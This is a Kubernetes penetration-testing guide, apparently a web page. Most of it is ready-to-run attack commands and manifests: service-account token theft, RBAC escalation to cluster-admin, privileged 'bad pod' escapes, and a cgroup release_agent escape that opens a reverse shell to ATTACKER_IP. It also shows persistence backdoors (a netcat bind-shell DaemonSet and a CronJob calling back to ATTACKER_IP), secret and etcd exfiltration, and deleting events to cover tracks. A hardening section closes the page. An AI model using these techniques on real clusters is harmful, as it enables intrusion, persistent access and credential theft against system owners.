Skip to content

Kubernetes

A comprehensive guide for penetration testing Kubernetes clusters and environments.


Table of Contents

  1. Kubernetes Architecture
  2. Enumeration
  3. Service Account Token Exploitation
  4. RBAC Privilege Escalation
  5. Pod Escape Techniques
  6. Common Vulnerabilities
  7. Pentesting Tools
  8. Attack Paths
  9. Post-Exploitation
  10. Security Best Practices

Kubernetes Architecture

Control Plane Components

┌─────────────────────────────────────────┐
│         Control Plane (Master)          │
├─────────────────────────────────────────┤
│  • kube-apiserver (6443)                │
│  • etcd (2379-2380)                     │
│  • kube-scheduler                       │
│  • kube-controller-manager              │
│  • cloud-controller-manager             │
└─────────────────────────────────────────┘

kube-apiserver - Front-end for the Kubernetes control plane, exposes the Kubernetes API etcd - Consistent and highly-available key-value store for all cluster data kube-scheduler - Watches for newly created Pods and assigns them to nodes kube-controller-manager - Runs controller processes cloud-controller-manager - Links the cluster to cloud provider's API

Worker Node Components

┌─────────────────────────────────────────┐
│           Worker Nodes                  │
├─────────────────────────────────────────┤
│  • kubelet (10250, 10255)               │
│  • kube-proxy                           │
│  • Container Runtime (Docker, containerd)│
└─────────────────────────────────────────┘

kubelet - Agent that ensures containers are running in a Pod kube-proxy - Network proxy maintaining network rules on nodes Container Runtime - Software responsible for running containers

Default Ports

Port Service Description
6443 kube-apiserver Kubernetes API server (HTTPS)
2379-2380 etcd Client and peer communication
10250 kubelet Kubelet API (HTTPS)
10255 kubelet Read-only kubelet API (HTTP) - deprecated
10256 kube-proxy Health check server
8080 kube-apiserver Insecure port (deprecated)
30000-32767 NodePort Services exposed on nodes

Enumeration

Detecting Kubernetes Environment

# Check if you're inside a Kubernetes pod
ls -la /var/run/secrets/kubernetes.io/serviceaccount/
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt

# Check environment variables
env | grep -i kube
env | grep -i service

# DNS resolution (Kubernetes DNS)
cat /etc/resolv.conf
nslookup kubernetes.default
nslookup kubernetes.default.svc.cluster.local

# Check for .dockerenv or container indicators
ls -la /.dockerenv
cat /proc/1/cgroup | grep -i kube

API Server Discovery

# Find the API server
echo $KUBERNETES_SERVICE_HOST
echo $KUBERNETES_PORT

# Common API server location
curl -k https://kubernetes.default.svc.cluster.local:443

# Get API server info
curl -k https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_PORT/api/v1

# Check version
curl -k https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_PORT/version

kubectl Configuration

# Set up kubectl alias with token
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER="https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_PORT}"

alias k='kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify=true'

# Alternative: Create kubeconfig
cat << EOF > /tmp/config
apiVersion: v1
kind: Config
clusters:
- cluster:
    insecure-skip-tls-verify: true
    server: https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_PORT
  name: local
contexts:
- context:
    cluster: local
    namespace: default
    user: local
  name: local
current-context: local
users:
- name: local
  user:
    token: $TOKEN
EOF

export KUBECONFIG=/tmp/config

Basic Enumeration

# Check permissions
kubectl auth can-i --list
kubectl auth can-i get pods
kubectl auth can-i create pods
kubectl auth can-i get secrets
kubectl auth can-i create pods --as system:serviceaccount:default:default

# List resources
kubectl get nodes
kubectl get pods --all-namespaces
kubectl get services --all-namespaces
kubectl get secrets --all-namespaces
kubectl get configmaps --all-namespaces
kubectl get namespaces
kubectl get deployments --all-namespaces
kubectl get daemonsets --all-namespaces

# Get current context
kubectl config view
kubectl config get-contexts
kubectl whoami

# Describe resources for detailed info
kubectl describe node <node-name>
kubectl describe pod <pod-name> -n <namespace>
kubectl get pod <pod-name> -n <namespace> -o yaml

Service Account Enumeration

# List service accounts
kubectl get serviceaccounts --all-namespaces
kubectl get sa --all-namespaces

# Get service account details
kubectl describe sa <service-account-name> -n <namespace>
kubectl get sa <service-account-name> -n <namespace> -o yaml

# List service account tokens
kubectl get secrets --all-namespaces --field-selector type=kubernetes.io/service-account-token

RBAC Enumeration

# List roles and clusterroles
kubectl get roles --all-namespaces
kubectl get clusterroles
kubectl get rolebindings --all-namespaces
kubectl get clusterrolebindings

# Describe RBAC resources
kubectl describe clusterrole cluster-admin
kubectl describe clusterrolebinding cluster-admin

# Find who has specific permissions
kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name=="cluster-admin") | .subjects'

# List all subjects with cluster-admin
kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name=="cluster-admin")'

Network Enumeration

# Get network policies
kubectl get networkpolicies --all-namespaces

# Service discovery
kubectl get svc --all-namespaces
kubectl get endpoints --all-namespaces

# DNS enumeration
for svc in $(kubectl get svc --all-namespaces -o json | jq -r '.items[].metadata.name'); do
  echo "Testing $svc"
  nslookup $svc.default.svc.cluster.local
done

# Scan internal network
nmap 10.0.0.0/8
nmap 172.16.0.0/12

Secret Enumeration

# List secrets
kubectl get secrets --all-namespaces
kubectl get secrets -n kube-system

# Get secret contents
kubectl get secret <secret-name> -n <namespace> -o yaml
kubectl get secret <secret-name> -n <namespace> -o json | jq -r '.data | to_entries[] | "\(.key): \(.value | @base64d)"'

# Decode specific secret
kubectl get secret <secret-name> -n <namespace> -o jsonpath='{.data.password}' | base64 -d

Service Account Token Exploitation

Extracting Service Account Token

# From inside a pod
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CA_CERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)

# View token claims (JWT)
echo $TOKEN | cut -d '.' -f2 | base64 -d | jq

# Test token
curl -k -H "Authorization: Bearer $TOKEN" \
  https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_PORT/api/v1/namespaces/$NAMESPACE/pods

Using Stolen Tokens

# Use token with kubectl
kubectl --token=$TOKEN --server=https://$APISERVER --insecure-skip-tls-verify=true get pods

# Use token with curl
curl -k -H "Authorization: Bearer $TOKEN" \
  https://$APISERVER/api/v1/namespaces/default/pods

# Test permissions with stolen token
kubectl --token=$TOKEN --server=https://$APISERVER --insecure-skip-tls-verify=true auth can-i --list

Mounting Other Service Account Tokens

# Create pod with different service account
apiVersion: v1
kind: Pod
metadata:
  name: token-stealer
spec:
  serviceAccountName: admin-sa  # Target service account
  containers:
  - name: alpine
    image: alpine
    command: ["sh", "-c", "cat /var/run/secrets/kubernetes.io/serviceaccount/token && sleep 3600"]

Token from Node Filesystem

# If you have access to node filesystem
# Tokens are stored in: /var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/*/token

find /var/lib/kubelet/pods -name token 2>/dev/null
cat /var/lib/kubelet/pods/<pod-id>/volumes/kubernetes.io~secret/<secret-name>/token

RBAC Privilege Escalation

Dangerous Permissions

1. Create Pods

# Check permission
kubectl auth can-i create pods

# Exploit: Create privileged pod
apiVersion: v1
kind: Pod
metadata:
  name: privesc-pod
spec:
  serviceAccountName: high-privilege-sa
  containers:
  - name: alpine
    image: alpine
    command: ["sh", "-c", "cat /var/run/secrets/kubernetes.io/serviceaccount/token && sleep 3600"]

2. Create/Update Deployments, DaemonSets, StatefulSets

# Check permission
kubectl auth can-i create deployments

# Exploit: Deploy with privileged service account
apiVersion: apps/v1
kind: Deployment
metadata:
  name: privesc-deployment
spec:
  replicas: 1
  selector:
    matchLabels:
      app: privesc
  template:
    metadata:
      labels:
        app: privesc
    spec:
      serviceAccountName: admin-sa
      containers:
      - name: alpine
        image: alpine
        command: ["/bin/sh", "-c", "sleep 3600"]

3. List/Get Secrets

# Check permission
kubectl auth can-i get secrets --all-namespaces

# Exploit: Extract all secrets
kubectl get secrets --all-namespaces -o json > all-secrets.json

# Get admin tokens from kube-system
kubectl get secrets -n kube-system
kubectl get secret <admin-token> -n kube-system -o jsonpath='{.data.token}' | base64 -d

4. Create/Bind Roles and ClusterRoles

# Check permissions
kubectl auth can-i create clusterrolebindings
kubectl auth can-i bind clusterroles

# Exploit: Bind cluster-admin to yourself
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: privesc-binding
subjects:
- kind: ServiceAccount
  name: default
  namespace: default
roleRef:
  kind: ClusterRole
  name: cluster-admin
  apiGroup: rbac.authorization.k8s.io

# Apply
kubectl apply -f privesc-binding.yaml

5. Impersonate Users/Groups/ServiceAccounts

# Check permission
kubectl auth can-i impersonate users
kubectl auth can-i impersonate groups
kubectl auth can-i impersonate serviceaccounts

# Exploit: Impersonate admin user
kubectl --as=admin get secrets --all-namespaces
kubectl --as=system:serviceaccount:kube-system:admin get secrets

# Impersonate system:masters group
kubectl --as-group=system:masters get secrets --all-namespaces

# Using API
curl -k -H "Authorization: Bearer $TOKEN" \
  -H "Impersonate-User: admin" \
  https://$APISERVER/api/v1/namespaces/default/secrets

6. Escalate Role Privileges

# Check permission
kubectl auth can-i escalate roles

# Exploit: Modify existing role
kubectl edit role <role-name> -n <namespace>
# Add: - apiGroups: ["*"]
#        resources: ["*"]
#        verbs: ["*"]

7. Certificate Signing Request (CSR) Abuse

# Check permissions
kubectl auth can-i create certificatesigningrequests
kubectl auth can-i approve certificatesigningrequests

# Generate key and CSR
openssl genrsa -out hacker.key 2048
openssl req -new -key hacker.key -out hacker.csr -subj "/CN=system:masters"

# Create CSR in Kubernetes
cat <<EOF | kubectl apply -f -
apiVersion: certificates.k8s.io/v1
kind: CertificateSigningRequest
metadata:
  name: hacker-csr
spec:
  request: $(cat hacker.csr | base64 | tr -d '\n')
  signerName: kubernetes.io/kube-apiserver-client
  usages:
  - client auth
EOF

# Approve CSR
kubectl certificate approve hacker-csr

# Get certificate
kubectl get csr hacker-csr -o jsonpath='{.status.certificate}' | base64 -d > hacker.crt

# Use certificate for authentication
kubectl --client-certificate=hacker.crt --client-key=hacker.key get secrets --all-namespaces

8. Patch Service Accounts

# Check permission
kubectl auth can-i patch serviceaccounts

# Exploit: Add secrets to service account
kubectl patch serviceaccount default -p '{"secrets": [{"name": "admin-token"}]}'

RBAC Privilege Escalation Paths

# Path 1: Create pods → Mount privileged SA token → Escalate
kubectl create pod  Mount admin SA  Extract token  Use token

# Path 2: Get secrets → Extract admin token → Escalate
kubectl get secrets -n kube-system  Extract token  Use admin token

# Path 3: Bind roles → Grant cluster-admin → Escalate
kubectl create clusterrolebinding  Bind cluster-admin  Full access

# Path 4: Impersonate → Act as admin → Escalate
kubectl --as=admin  Execute as admin  Full access

# Path 5: Node access → Steal tokens → Escalate
Access node FS  Find pod tokens  Use privileged tokens

Pod Escape Techniques

Bad Pod #1: Everything Allowed (Privileged + hostPath + hostNetwork + hostPID + hostIPC)

apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: alpine
    image: alpine
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: ["/bin/sh"]
    args: ["-c", "chroot /host bash"]
  volumes:
  - name: noderoot
    hostPath:
      path: /

Bad Pod #2: Privileged + hostPID

apiVersion: v1
kind: Pod
metadata:
  name: priv-hostpid
spec:
  hostPID: true
  containers:
  - name: alpine
    image: alpine
    securityContext:
      privileged: true
    command: ["/bin/sh"]
    args: ["-c", "nsenter -t 1 -m -u -i -n bash"]

Bad Pod #3: Privileged Only

apiVersion: v1
kind: Pod
metadata:
  name: priv-only
spec:
  containers:
  - name: alpine
    image: alpine
    securityContext:
      privileged: true
    command: ["/bin/sh"]
    args: ["-c", "mount /dev/sda1 /mnt && chroot /mnt bash"]

Bad Pod #4: hostPath Only

apiVersion: v1
kind: Pod
metadata:
  name: hostpath-mount
spec:
  containers:
  - name: alpine
    image: alpine
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: ["/bin/sh"]
    args: ["-c", "echo 'ssh-rsa AAAA...' >> /host/root/.ssh/authorized_keys"]
  volumes:
  - name: noderoot
    hostPath:
      path: /

Bad Pod #5: hostPID Only

apiVersion: v1
kind: Pod
metadata:
  name: hostpid-only
spec:
  hostPID: true
  containers:
  - name: alpine
    image: alpine
    command: ["/bin/sh"]
    args: ["-c", "ps aux | grep -i secret"]  # View all host processes

Bad Pod #6: hostNetwork Only

apiVersion: v1
kind: Pod
metadata:
  name: hostnetwork-only
spec:
  hostNetwork: true
  containers:
  - name: alpine
    image: alpine
    command: ["/bin/sh"]
    args: ["-c", "tcpdump -i any -w /tmp/capture.pcap"]  # Sniff host traffic

Container Breakout via Privileged Container

# Inside privileged container
# Method 1: Mount host filesystem
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host

# Method 2: Access via nsenter
nsenter --target 1 --mount --uts --ipc --net --pid bash

# Method 3: Create cgroup release_agent escape
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

Capabilities-Based Escape

# Check capabilities
capsh --print
cat /proc/self/status | grep Cap

# CAP_SYS_ADMIN escape
# Similar to privileged container escape

# CAP_SYS_PTRACE escape
# Inject into host processes

# CAP_SYS_MODULE escape
# Load malicious kernel modules

Common Vulnerabilities

CVE-2018-1002105 (Privilege Escalation via API Server)

Description: Unauthenticated users can escalate privileges through API aggregation Affected Versions: All versions prior to 1.10.11, 1.11.5, 1.12.3 Impact: Remote privilege escalation to cluster admin

# Detection
kubectl version

# Exploit (conceptual)
# Abuse proxied upgrade requests to escalate privileges

CVE-2019-11247 (API Server Authorization Bypass)

Description: API server improperly validates object scope Impact: Cross-namespace access to resources

CVE-2019-11253 (YAML Parsing DoS)

Description: Malicious YAML causes API server DoS Impact: Denial of service

CVE-2020-8558 (Node Network Bypass)

Description: localhost services accessible from other nodes Impact: Unauthorized access to node services

CVE-2020-8559 (Privilege Escalation via Redirect)

Description: Compromised node can redirect API requests Affected Versions: 1.16.0-1.16.12, 1.17.0-1.17.8, 1.18.0-1.18.5 Impact: Node compromise leads to cluster compromise

Description: Subpath volume mounts vulnerable to symlink attack Impact: Access files outside container

# Exploit path traversal via symlinks in subPath

CVE-2021-25735 (Node Update Bypass)

Description: NodeRestriction admission controller bypass Impact: Malicious nodes can bypass validations

CVE-2022-0492 (Container Escape - Linux Kernel)

Description: cgroups privilege escalation Impact: Container escape to host

# Exploit via cgroup release_agent
# Requires CAP_DAC_OVERRIDE or root

CVE-2023-3676, CVE-2023-3955, CVE-2023-3893 (Windows Node RCE)

Description: Command injection via YAML on Windows nodes Affected: Kubernetes on Windows Impact: SYSTEM-level code execution

# Exploit via malicious subPath in YAML
subPath: "$(Start-Process cmd)"

CVE-2023-5528 (Windows Local Volume RCE)

Description: Command injection via local volumes on Windows Impact: Admin privileges on Windows nodes

CVE-2024-21626 (Leaky Vessels - runC)

Description: Container escape via working directory manipulation Impact: Full container escape

CVE-2024-31989 (Argo CD Redis Exposure)

Description: Argo CD redis instance has no password Impact: Privilege escalation, information leakage

CVE-2025-1974, CVE-2025-24514 (IngressNightmare - NGINX Controller)

Description: RCE via ingress-nginx admission webhook Affected: NGINX Ingress Controller Impact: Cluster-wide secret access, RCE

# Detection
kubectl get pods -n ingress-nginx
kubectl version

Pentesting Tools

kube-hunter

# Installation
pip install kube-hunter

# Remote scanning
kube-hunter --remote <target-ip>

# From inside pod
kube-hunter --pod

# Active hunting (exploits vulnerabilities)
kube-hunter --active

# Network scanning
kube-hunter --cidr 10.0.0.0/8

KubiScan

# Installation
git clone https://github.com/cyberark/KubiScan
cd KubiScan
pip install -r requirements.txt

# Run with kubeconfig
python3 kubiscan.py

# Find risky roles
python3 kubiscan.py -rr

# Find risky rolebindings
python3 kubiscan.py -rrb

# Find risky subjects (users/SAs)
python3 kubiscan.py -rs

# Get service account tokens
python3 kubiscan.py -at

Peirates

# Download
wget https://github.com/inguardians/peirates/releases/download/v1.1.19/peirates-linux-amd64.tar.xz
tar -xf peirates-linux-amd64.tar.xz

# Run from compromised pod
./peirates

# Main menu options:
# [1] List service accounts
# [2] Get service account token
# [3] Switch to another token
# [4] List pods
# [5] Get secrets
# [6] Attack pod exec
# [7] Request a new token
# [8] Scan for pods with volume mounts

kubectl Plugins

# kubectl-who-can
kubectl who-can create pods
kubectl who-can get secrets --all-namespaces

# kubectl-access-matrix
kubectl access-matrix

# rakkess
kubectl rakkess
kubectl rakkess --verbs get,list,watch,create,delete

# rbac-lookup
kubectl rbac-lookup admin
kubectl rbac-lookup -o wide

kube-bench

# Run as job in cluster
kubectl apply -f https://raw.githubusercontent.com/aquasecurity/kube-bench/main/job.yaml

# Run on node
docker run --pid=host -v /etc:/etc:ro -v /var:/var:ro \
  aquasec/kube-bench:latest run --targets node

# Check master components
docker run --pid=host -v /etc:/etc:ro -v /var:/var:ro \
  aquasec/kube-bench:latest run --targets master

Kubescape

# Installation
curl -s https://raw.githubusercontent.com/kubescape/kubescape/master/install.sh | /bin/bash

# Scan cluster
kubescape scan

# Scan against specific framework
kubescape scan framework nsa
kubescape scan framework mitre
kubescape scan framework cis

# Scan specific namespace
kubescape scan --include-namespaces default

# Generate report
kubescape scan --format json --output results.json

KubeHound

# Attack path analysis
# Installation and setup required

# Example query - Find paths to cluster-admin
kh.V().has('name', 'default').repeat(outE().inV()).times(3).has('critical', true).path()

# Find container escape paths
kh.V().has('pod', true).outE('CE_MODULE_LOAD').inV().path()

# Find privilege escalation via RBAC
kh.V().has('type', 'Identity').outE('IDENTITY_ASSUME').inV().path()

kubeletctl

# Installation
wget https://github.com/cyberark/kubeletctl/releases/download/v1.11/kubeletctl_linux_amd64
chmod +x kubeletctl_linux_amd64

# Scan for open kubelets
kubeletctl scan --cidr 10.0.0.0/8

# Get pods
kubeletctl pods -s <target-ip>

# Run command in pod
kubeletctl exec "id" -s <target-ip> -p <pod-name> -c <container-name>

# Get pod logs
kubeletctl logs -s <target-ip> -p <pod-name> -c <container-name>

Other Useful Tools

# kubeaudit - Audit Kubernetes clusters
kubeaudit all

# kubesec - Security risk analysis for Kubernetes resources
kubesec scan pod.yaml

# Trivy - Vulnerability scanner
trivy k8s --report summary cluster

# Falco - Runtime security
# Monitors suspicious activity in Kubernetes

# BOtB (Break out the Box)
# Automated container breakout detection

# CDK (Container Duck)
# Container environment evaluation

Attack Paths

Path 1: Anonymous API Access → Enumeration → Privilege Escalation

# 1. Check for anonymous access
curl -k https://<api-server>:6443/api/v1

# 2. Enumerate resources
curl -k https://<api-server>:6443/api/v1/namespaces
curl -k https://<api-server>:6443/api/v1/pods

# 3. Create malicious pod if allowed
curl -k -X POST https://<api-server>:6443/api/v1/namespaces/default/pods \
  -H "Content-Type: application/json" \
  -d @malicious-pod.json

Path 2: Compromised Pod → Service Account Token → Privilege Escalation

# 1. Extract token from pod
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

# 2. Test permissions
kubectl --token=$TOKEN auth can-i --list

# 3. Exploit permissions (e.g., create pods with privileged SA)
kubectl --token=$TOKEN create -f privesc-pod.yaml

# 4. Extract new token
NEW_TOKEN=$(kubectl --token=$TOKEN exec -it privesc-pod -- cat /var/run/secrets/kubernetes.io/serviceaccount/token)

# 5. Escalate to cluster admin
kubectl --token=$NEW_TOKEN get secrets --all-namespaces

Path 3: Exposed Kubelet → Token Theft → Cluster Compromise

# 1. Find exposed kubelet
nmap -p 10250 10.0.0.0/8

# 2. Access kubelet API
curl -k https://<node-ip>:10250/pods

# 3. Extract service account tokens
kubeletctl scan --cidr 10.0.0.0/8
kubeletctl pods -s <node-ip>
kubeletctl exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -s <node-ip> -p <pod> -c <container>

# 4. Use extracted token
kubectl --token=$EXTRACTED_TOKEN get secrets --all-namespaces

Path 4: RBAC Misconfiguration → Role Binding → Cluster Admin

# 1. Check current permissions
kubectl auth can-i create clusterrolebindings

# 2. Bind cluster-admin to yourself
kubectl create clusterrolebinding attacker-admin \
  --clusterrole=cluster-admin \
  --serviceaccount=default:default

# 3. Verify escalation
kubectl get secrets --all-namespaces

Path 5: Container Escape → Node Access → Token Collection

# 1. Deploy privileged pod
kubectl apply -f privileged-pod.yaml

# 2. Escape to node
kubectl exec -it privileged-pod -- bash
chroot /host

# 3. Collect all service account tokens from node
find /var/lib/kubelet/pods -name token

# 4. Use highest privileged token
kubectl --token=$ADMIN_TOKEN get secrets --all-namespaces

Post-Exploitation

Persistence

# Create backdoor service account
kubectl create sa backdoor
kubectl create clusterrolebinding backdoor-admin \
  --clusterrole=cluster-admin \
  --serviceaccount=default:backdoor

# Get persistent token
kubectl create token backdoor --duration=87600h  # 10 years

# Create malicious DaemonSet (runs on all nodes)
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: backdoor
  namespace: kube-system
spec:
  selector:
    matchLabels:
      app: backdoor
  template:
    metadata:
      labels:
        app: backdoor
    spec:
      hostNetwork: true
      hostPID: true
      containers:
      - name: backdoor
        image: alpine
        command: ["/bin/sh", "-c"]
        args:
        - |
          while true; do
            nc -l -p 4444 -e /bin/sh
          done
        securityContext:
          privileged: true

# Create CronJob for periodic access
apiVersion: batch/v1
kind: CronJob
metadata:
  name: backdoor-cron
spec:
  schedule: "*/5 * * * *"  # Every 5 minutes
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: backdoor
            image: alpine
            command: ["/bin/sh", "-c"]
            args:
            - "nc ATTACKER_IP 4444 -e /bin/sh"
          restartPolicy: OnFailure

Data Exfiltration

# Extract all secrets
kubectl get secrets --all-namespaces -o json > secrets.json

# Extract ConfigMaps
kubectl get configmaps --all-namespaces -o json > configmaps.json

# Extract environment variables from all pods
kubectl get pods --all-namespaces -o json | jq '.items[].spec.containers[].env'

# Extract etcd data (if accessible)
ETCDCTL_API=3 etcdctl --endpoints=https://127.0.0.1:2379 \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  --cert=/etc/kubernetes/pki/etcd/server.crt \
  --key=/etc/kubernetes/pki/etcd/server.key \
  get / --prefix --keys-only

Lateral Movement

# Move to other namespaces
kubectl get pods -n kube-system
kubectl exec -it <pod-name> -n kube-system -- bash

# Access cloud metadata (AWS, GCP, Azure)
curl http://169.254.169.254/latest/meta-data/
curl http://metadata.google.internal/computeMetadata/v1/
curl http://169.254.169.254/metadata/instance?api-version=2021-02-01 -H "Metadata:true"

# Pivot to cloud resources
# Use pod IAM roles/service accounts to access cloud APIs

Covering Tracks

# Delete audit logs (if accessible)
kubectl delete events --all
kubectl delete events --all -n kube-system

# Remove malicious pods
kubectl delete pod <malicious-pod>

# Remove RBAC modifications
kubectl delete clusterrolebinding <backdoor-binding>

# Clean pod logs
kubectl logs <pod-name> --tail=0 > /dev/null

Security Best Practices

API Server Security

# ✅ Enable RBAC
--authorization-mode=Node,RBAC

# ✅ Disable anonymous auth
--anonymous-auth=false

# ✅ Enable audit logging
--audit-log-path=/var/log/kubernetes/audit.log
--audit-policy-file=/etc/kubernetes/audit-policy.yaml

# ✅ Disable insecure port
--insecure-port=0

# ✅ Enable admission controllers
--enable-admission-plugins=PodSecurityPolicy,NodeRestriction,AlwaysPullImages

# ❌ Never expose without authentication
# Don't use: --insecure-port=8080

Pod Security

# ✅ Use Pod Security Standards
apiVersion: v1
kind: Namespace
metadata:
  name: secure-namespace
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/warn: restricted

# ✅ Drop all capabilities
securityContext:
  capabilities:
    drop:
      - ALL

# ✅ Run as non-root
securityContext:
  runAsNonRoot: true
  runAsUser: 1000

# ✅ Read-only root filesystem
securityContext:
  readOnlyRootFilesystem: true

# ✅ Disable privilege escalation
securityContext:
  allowPrivilegeEscalation: false

# ❌ Avoid privileged containers
# Never use: privileged: true

# ❌ Avoid hostPath mounts
# Minimize: hostPath volumes

# ❌ Avoid host namespaces
# Don't use: hostNetwork, hostPID, hostIPC: true

RBAC Security

# ✅ Principle of least privilege
# Grant only necessary permissions

# ✅ Avoid wildcards in RBAC
# Don't use: resources: ["*"]
# Don't use: verbs: ["*"]

# ✅ Scope to namespaces
# Use Roles instead of ClusterRoles when possible

# ✅ Audit RBAC regularly
kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name=="cluster-admin")'

# ✅ Disable auto-mounting of service account tokens
automountServiceAccountToken: false

# ✅ Create dedicated service accounts
# Don't use default service account

Network Security

# ✅ Implement Network Policies
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-all
spec:
  podSelector: {}
  policyTypes:
  - Ingress
  - Egress

# ✅ Restrict egress traffic
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-dns-only
spec:
  podSelector: {}
  policyTypes:
  - Egress
  egress:
  - to:
    - namespaceSelector:
        matchLabels:
          name: kube-system
    ports:
    - protocol: UDP
      port: 53

# ✅ Use service mesh for mTLS
# Consider Istio, Linkerd

Secrets Management

# ✅ Encrypt secrets at rest
--encryption-provider-config=/etc/kubernetes/encryption-config.yaml

# ✅ Use external secret managers
# AWS Secrets Manager, HashiCorp Vault, etc.

# ✅ Rotate secrets regularly
kubectl create secret generic my-secret --dry-run=client -o yaml | kubectl apply -f -

# ✅ Limit secret access
# Use RBAC to restrict secret access

# ❌ Don't store secrets in code or ConfigMaps
# Use Secrets resource instead

Monitoring and Logging

# ✅ Enable audit logging
--audit-log-path=/var/log/kubernetes/audit.log

# ✅ Monitor API server access
# Watch for unusual API calls

# ✅ Use runtime security tools
# Falco, Tetragon, Tracee

# ✅ Monitor RBAC changes
kubectl get events --watch | grep -i rolebinding

# ✅ Implement SIEM integration
# Send Kubernetes logs to SIEM

# ✅ Alert on suspicious activities
# Privilege escalation attempts
# New ClusterRoleBindings
# Privileged pod creation
# Node access

Image Security

# ✅ Scan images for vulnerabilities
trivy image <image-name>

# ✅ Use image signing and verification
# Implement Cosign, Notary

# ✅ Use private registries
# Don't pull from untrusted registries

# ✅ Implement admission controllers
# OPA Gatekeeper, Kyverno

# ✅ Use distroless/minimal base images
FROM gcr.io/distroless/static

# ✅ Scan running workloads
trivy k8s cluster

Quick Reference Commands

Enumeration Quick Wins

# Am I in a pod?
ls /var/run/secrets/kubernetes.io/serviceaccount/

# What can I do?
kubectl auth can-i --list

# Get all secrets (if allowed)
kubectl get secrets --all-namespaces -o json

# Find admin tokens
kubectl get secrets -n kube-system | grep -i admin

# Check for privileged pods
kubectl get pods --all-namespaces -o json | jq '.items[] | select(.spec.securityContext.privileged==true)'

Exploitation Quick Wins

# Create cluster-admin binding (if allowed)
kubectl create clusterrolebinding hacker --clusterrole=cluster-admin --serviceaccount=default:default

# Deploy privileged pod
kubectl run hacker --image=alpine --restart=Never --overrides='{"spec":{"hostNetwork":true,"hostPID":true,"containers":[{"name":"hacker","image":"alpine","command":["nsenter","--target","1","--mount","--uts","--ipc","--net","--pid","--","bash"],"securityContext":{"privileged":true}}]}}'

# Extract token from another pod
kubectl exec <pod-name> -- cat /var/run/secrets/kubernetes.io/serviceaccount/token

Common Attack Scenarios

# Scenario 1: Get secrets → Extract admin token → Escalate
kubectl get secrets --all-namespaces

# Scenario 2: Create pods → Mount privileged SA → Escalate
kubectl create -f privileged-pod.yaml

# Scenario 3: Bind roles → Grant cluster-admin → Escalate
kubectl create clusterrolebinding

# Scenario 4: Impersonate → Act as admin → Escalate
kubectl --as=admin get secrets

# Scenario 5: Node access → Collect tokens → Escalate
chroot /host && find /var/lib/kubelet/pods -name token

Additional Resources

Documentation

HackTricks Resources

Learning Resources

MITRE ATT&CK for Containers

Comments